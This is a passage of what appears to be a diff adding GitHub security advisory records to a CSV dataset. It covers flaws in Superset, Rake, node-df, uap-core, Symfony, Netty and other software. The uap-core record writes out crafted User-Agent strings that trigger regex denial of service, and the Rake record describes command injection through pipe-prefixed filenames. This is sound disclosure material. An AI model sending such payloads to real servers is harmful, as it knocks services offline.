'https://lists.apache.org/thread.html/r385c35a7c6f4acaacf37fe22922bb8e2aed9d322d0fa6dc1d45acddb%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r385c35a7c6f4acaacf37fe22922bb8e2aed9d322d0fa6dc1d45acddb@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r386966780034aadee69ffd82d44555117c9339545b9ce990fe490a3e%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r386966780034aadee69ffd82d44555117c9339545b9ce990fe490a3e@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4176155240cdc36aad7869932d9c29551742c7fa630f209fb4a8e649%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4176155240cdc36aad7869932d9c29551742c7fa630f209fb4a8e649@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r43c6f75d203b8afc4fbd6c3200db0384a18a11c59d085b1a9bb0ccfe%40%3Cuser.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r43c6f75d203b8afc4fbd6c3200db0384a18a11c59d085b1a9bb0ccfe@%3Cuser.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r48a32f2dd6976d33f7a12b7e09ec7ea1895f8facba82b565587c28ac%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r48a32f2dd6976d33f7a12b7e09ec7ea1895f8facba82b565587c28ac@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4bbfa1439d7a4e1712e260bfc3d90f7cf997abfd641cccde6432d4ab%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4bbfa1439d7a4e1712e260bfc3d90f7cf997abfd641cccde6432d4ab@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r500867b74f42230a3d65b8aec31fc93ac390eeae737c91a759ab94cb%40%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r500867b74f42230a3d65b8aec31fc93ac390eeae737c91a759ab94cb@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f16a1bd31a7e94ca78eda686179930781aa3a4a990cd55986703581%40%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f16a1bd31a7e94ca78eda686179930781aa3a4a990cd55986703581@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r634468eb3218ab02713128ff6f4818c618622b2b3de4d958138dde49%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r634468eb3218ab02713128ff6f4818c618622b2b3de4d958138dde49@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589%40%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6dea2a887f5eb1d68f124d64b14cd1a04f682f06de8cd01b7e4214e0%40%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6dea2a887f5eb1d68f124d64b14cd1a04f682f06de8cd01b7e4214e0@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r80e8882c86c9c17a57396a5ef7c4f08878d629a0291243411be0de3a%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r80e8882c86c9c17a57396a5ef7c4f08878d629a0291243411be0de3a@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra37700b842790883b9082e6b281fb7596f571b13078a4856cd38f2c2%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra37700b842790883b9082e6b281fb7596f571b13078a4856cd38f2c2@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb036bf32e4dacc49335e3bdc1be8e53d6f54df692ac8e2251a6884bd%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb036bf32e4dacc49335e3bdc1be8e53d6f54df692ac8e2251a6884bd@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb47911c179c9f3e8ea3f134b5645e63cd20c6fc63bd0b43ab5864bd1%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb47911c179c9f3e8ea3f134b5645e63cd20c6fc63bd0b43ab5864bd1@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb8c09b14fd57d855dc21e0a037dc29258c2cbe9c1966bfff453a02e4%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb8c09b14fd57d855dc21e0a037dc29258c2cbe9c1966bfff453a02e4@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rce00a1c60f7df4b10e72fa87827c102f55b074bb91993631df2c21f9%40%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rce00a1c60f7df4b10e72fa87827c102f55b074bb91993631df2c21f9@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd27730cfc3066dfcf15927c8e800603728d5dedf17eee1f8c6e3507c%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd27730cfc3066dfcf15927c8e800603728d5dedf17eee1f8c6e3507c@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd3a34d663e2a25b9ab1e8a1a94712cd5f100f098578aec79af48161e%40%3Ccommon-dev.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd3a34d663e2a25b9ab1e8a1a94712cd5f100f098578aec79af48161e@%3Ccommon-dev.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re07c51a8026c11e6e5513bfdc66d52d1c1027053e480fb8073356257%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re07c51a8026c11e6e5513bfdc66d52d1c1027053e480fb8073356257@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re646dcc2739d92117bf9a76a33c600ed3b65e8b4e9b6f441e366b72b%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re646dcc2739d92117bf9a76a33c600ed3b65e8b4e9b6f441e366b72b@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00039.html'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-04T20:42:17Z', 'nvd_published_at': '2019-11-18T17:15:00Z'}"
+1.4.0,GHSA-fxjm-wvj9-9c39,2023-09-01T10:12:40Z,2020-02-26T19:54:57Z,,['CVE-2020-1932'],Information disclosure in Apache Superset,"An information disclosure issue was found in Apache Superset 0.34.0, 0.34.1, 0.35.0, and 0.35.1. Authenticated Apache Superset users are able to retrieve other users' information, including hashed passwords, by accessing an unused and undocumented API endpoint on Apache Superset.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.34.0'}, {'fixed': '0.35.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1932'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4e5323c3bc786005495311a6ff53ac6d990b2c7eb52941a1a13ce227%40%3Cdev.superset.apache.org%3E'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T15:51:07Z', 'nvd_published_at': '2020-01-28T01:15:00Z'}"
+1.4.0,GHSA-3jqw-vv45-mjhh,2023-05-22T18:25:18Z,2020-02-12T23:37:46Z,,['CVE-2020-5241'],XSS/Script injection vulnerability in matestack,"matestack-ui-core (RubyGem) before 0.7.4 is vulnerable to XSS/Script injection.
+
+This vulnerability is patched in version 0.7.4.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'matestack-ui-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matestack/matestack-ui-core/security/advisories/GHSA-3jqw-vv45-mjhh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5241'}, {'type': 'WEB', 'url': 'https://github.com/matestack/matestack-ui-core/commit/5c61571739e860db9ca578fe09ab4733878cb0fc'}, {'type': 'WEB', 'url': 'https://github.com/matestack/matestack-ui-core/commit/e96915cf20c4fa0571df7fa21e9b09a69be19107'}, {'type': 'PACKAGE', 'url': 'https://github.com/matestack/matestack-ui-core'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/matestack-ui-core/CVE-2020-5241.yml'}]","{'cwe_ids': ['CWE-80'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-12T23:37:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jppv-gw3r-w3q8,2023-08-29T15:03:03Z,2020-02-28T16:54:36Z,,['CVE-2020-8130'],OS Command Injection in Rake,There is an OS command injection vulnerability in Ruby Rake before 12.3.3 in `Rake::FileList` when supplying a filename that begins with the pipe character `|`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'rake'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.3.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 12.3.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8130'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rake/commit/5b8f8fc41a5d7d7d6a5d767e48464c60884d3aee'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/651518'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-jppv-gw3r-w3q8'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/rake'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rake/CVE-2020-8130.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00026.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/523CLQ62VRN3VVC52KMPTROCCKY4Z36B/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXMX4ARNX2JLRJMSH4N3J3UBMUT5CI44/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4295-1/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T15:50:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mxhp-79qh-mcx6,2023-01-30T19:22:17Z,2020-02-19T16:43:42Z,,['CVE-2019-10790'],TaffyDB can allow access to any data items in the DB,"TaffyDB allows attackers to forge adding additional properties into user-input processed by taffy which can allow access to any data items in the DB. Taffy sets an internal index for each data item in its DB. However, it is found that the internal index can be forged by adding additional properties into user-input. If index is found in the query, TaffyDB will ignore other query conditions and directly return the indexed data item. Moreover, the internal index is in an easily-guessable format (e.g., T000002R000001). As such, attackers can use this vulnerability to access any data items in the DB. **Note:** `taffy` and its successor package `taffydb` are not maintained.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'taffy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'taffydb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.7.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10790'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TAFFY-546521'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/taffy'}, {'type': 'PACKAGE', 'url': 'https://www.npmjs.com/package/taffydb'}]","{'cwe_ids': ['CWE-20', 'CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-18T20:15:03Z', 'nvd_published_at': '2020-02-17T20:15:00Z'}"
+1.4.0,GHSA-wp7m-mrvf-599c,2021-11-01T14:12:07Z,2020-02-14T23:09:10Z,,['CVE-2019-15597'],Command Injection in node-df,"All versions of `node-df` are vulnerable to Command Injection. The package fails to sanitize filenames passed to the `file` option. If this value is user-controlled it may allow attackers to run arbitrary commands in the server.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-df'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15597'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/703412'}, {'type': 'PACKAGE', 'url': 'https://github.com/adriano-di-giovanni/node-df'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1431'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-13T17:09:46Z', 'nvd_published_at': '2019-12-18T21:15:00Z'}"
+1.4.0,GHSA-8rc5-hx3v-2jg7,2021-08-19T19:25:06Z,2020-02-27T20:36:29Z,,['CVE-2019-10772'],Sanitizer bypass in svg-sanitizer,"It is possible to bypass enshrined/svg-sanitize before 0.13.1 using the ""xlink:href"" attribute due to mishandling of the xlink namespace by the sanitizer.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'enshrined/svg-sanitize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.13.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10772'}, {'type': 'WEB', 'url': 'https://github.com/darylldoyle/svg-sanitizer/commit/6add43e5c5649bc40e3afcb68c522720dcb336f9'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PHP-ENSHRINEDSVGSANITIZE-536969'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T15:32:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cmcx-xhr8-3w9p,2023-05-04T20:02:25Z,2020-02-20T23:26:10Z,,['CVE-2020-5243'],Denial of Service in uap-core when processing crafted User-Agent strings,"### Impact
+
+Some regexes are vulnerable to regular expression denial of service (REDoS) due to overlapping capture groups. This allows remote attackers to overload a server by setting the User-Agent header in an HTTP(S) request to maliciously crafted long strings.
+
+### Patches
+
+Please update uap-core to &gt;= v0.7.3
+
+Downstream packages such as uap-python, uap-ruby etc which depend upon uap-core follow different version schemes.
+
+### Details
+
+Each vulnerable regular expression reported here contains 3 overlapping capture groups. Backtracking has approximately cubic time complexity with respect to the length of the user-agent string.
+
+#### Regex 1:
+
+```
+\bSmartWatch *\( *([^;]+) *; *([^;]+) *;
+```
+
+is vulnerable in portion ` *([^;]+) *` and can be attacked with
+
+```python
+&quot;SmartWatch(&quot; + (&quot; &quot; * 3500) + &quot;z&quot;
+```
+e.g.
+```
+SmartWatch( z
+```
+
+
+#### Regex 2:
+
+```
+; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)
+```
+
+is vulnerable in portion `\d+[^\);]+[^\);]*` and can be attacked with
+
+```python
+&quot;;A Build HuaweiA&quot; + (&quot;4&quot; * 3500) + &quot;z&quot;
+```
+
+
+#### Regex 3:
+
+```
+(HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(LG)E *; *([^;]*) *;[^;]*;[^;]*;\)
+```
+
+is vulnerable in portion ` *([^;]*) *` and can be attacked with
+
+```python
+&quot;HbbTV/0.0.0 (;LGE;&quot; + (&quot; &quot; * 3500) + &quot;z&quot;
+```
+
+#### Regex 4:
+
+```
+(HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(?:CUS:([^;]*)|([^;]+)) *; *([^;]*) *;.*;
+```
+
+is vulnerable in portions ` *(?:CUS:([^;]*)|([^;]+)) *` and ` *([^;]*) *` and can be attacked with
+
+```python
+&quot;HbbTV/0.0.0 (;CUS:;&quot; + (&quot; &quot; * 3500) + &quot;z&quot;
+&quot;HbbTV/0.0.0 (;&quot; + (&quot; &quot; * 3500) + &quot;z&quot;
+&quot;HbbTV/0.0.0 (;z;&quot; + (&quot; &quot; * 3500) + &quot;z&quot;
+```
+
+Reported by Ben Caller @bcaller","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'uap-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'user_agent_parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ua-parser/uap-core/security/advisories/GHSA-cmcx-xhr8-3w9p'}, {'type': 'WEB', 'url': 'https://github.com/ua-parser/uap-ruby/security/advisories/GHSA-pcqq-5962-hvcw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5243'}, {'type': 'WEB', 'url': 'https://github.com/ua-parser/uap-core/commit/0afd61ed85396a3b5316f18bfd1edfaadf8e88e1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/user_agent_parser/CVE-2020-5243.yml'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-20T23:09:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9r27-994c-4xch,2020-02-21T20:20:53Z,2020-02-24T17:34:02Z,,[],discord-html not escaping HTML code blocks when lacking a language identifier,"### Impact
+Any website using discord-markdown with user-generated markdown is vulnerable to having code injected into the page where the markdown is displayed.
+
+### Patches
+This has been patched in version 2.3.1
+
+### Workarounds
+Escape the characters `<>&` before sending plain code blocks to discord-markdown.
+
+### References
+https://github.com/brussell98/discord-markdown/issues/13",[],"[{'package': {'ecosystem': 'npm', 'name': 'discord-markdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/brussell98/discord-markdown/security/advisories/GHSA-9r27-994c-4xch'}, {'type': 'WEB', 'url': 'https://github.com/brussell98/discord-markdown/issues/13'}, {'type': 'WEB', 'url': 'https://github.com/brussell98/discord-markdown/commit/7ce2eb66520815dcf5e97ef2bc8a2d5979da66e7'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-21T20:20:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9c29-9h4m-wg5p,2023-08-31T10:11:22Z,2020-02-26T19:55:14Z,,['CVE-2019-12414'],Users can view database names in Apache Superset,"In Apache Incubator Superset before 0.32, a user can view database names that he has no access to on a dropdown list in SQLLab","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.32.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12414'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/396034aabe08dd349ff44eb062c718aadcf1b4e86f6372c7d5e988c0%40%3Cdev.superset.apache.org%3E'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T15:51:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w2fr-65vp-mxw3,2021-08-19T17:12:23Z,2020-02-12T18:44:50Z,,['CVE-2019-10912'],Deserialization of untrusted data in Symfony,"In Symfony before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, it is possible to cache objects that may contain bad user input. On serialization or unserialization, this could result in the deletion of files that the current user has access to. This is related to symfony/cache and symfony/phpunit-bridge.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/cache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.4.26'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/cache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/cache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/phpunit-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.50'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/phpunit-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.4.26'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/phpunit-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/phpunit-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.50'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.4.26'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10912'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/4fb975281634b8d49ebf013af9e502e67c28816b'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/cache/CVE-2019-10912.yaml'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/phpunit-bridge/CVE-2019-10912.yaml'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2019-10912.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42UEKSLKJB72P24JBWVN6AADHLMYSUQD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6QEAOZXVNDA63537A2OIH4QE77EKZR5O/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BAC2TQVEEH5FDJSSWPM2BCRIPTCOEMMO/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BHHIG4GMSGEIDT3RITSW7GJ5NT6IBHXU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LFARAUAWZE4UDSKVDWRD35D75HI5UGSD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDSM576XIOVXVCMHNJHLBBZBTOD62LDA/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RTJGZJLPG5FHKFH7KNAKNTWOGBB6LXAL/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLOZX5BZMQKWG7PJRQL6MB5CAMKBQAWD/'}, {'type': 'WEB', 'url': 'https://seclists.org/bugtraq/2019/May/21'}, {'type': 'WEB', 'url': 'https://symfony.com/blog/cve-2019-10912-prevent-destructors-with-side-effects-from-being-unserialized'}, {'type': 'WEB', 'url': 'https://symfony.com/cve-2019-10912'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2019-016/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2019/dsa-4441'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-11T20:17:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p2v9-g2qv-p635,2021-08-25T17:37:42Z,2020-02-21T18:55:04Z,,['CVE-2019-20445'],HTTP Request Smuggling in Netty,"HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-handler'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.45'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20445'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/issues/9861'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/pull/9865'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0497'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0567'}, {'type': 'WEB', 'url': 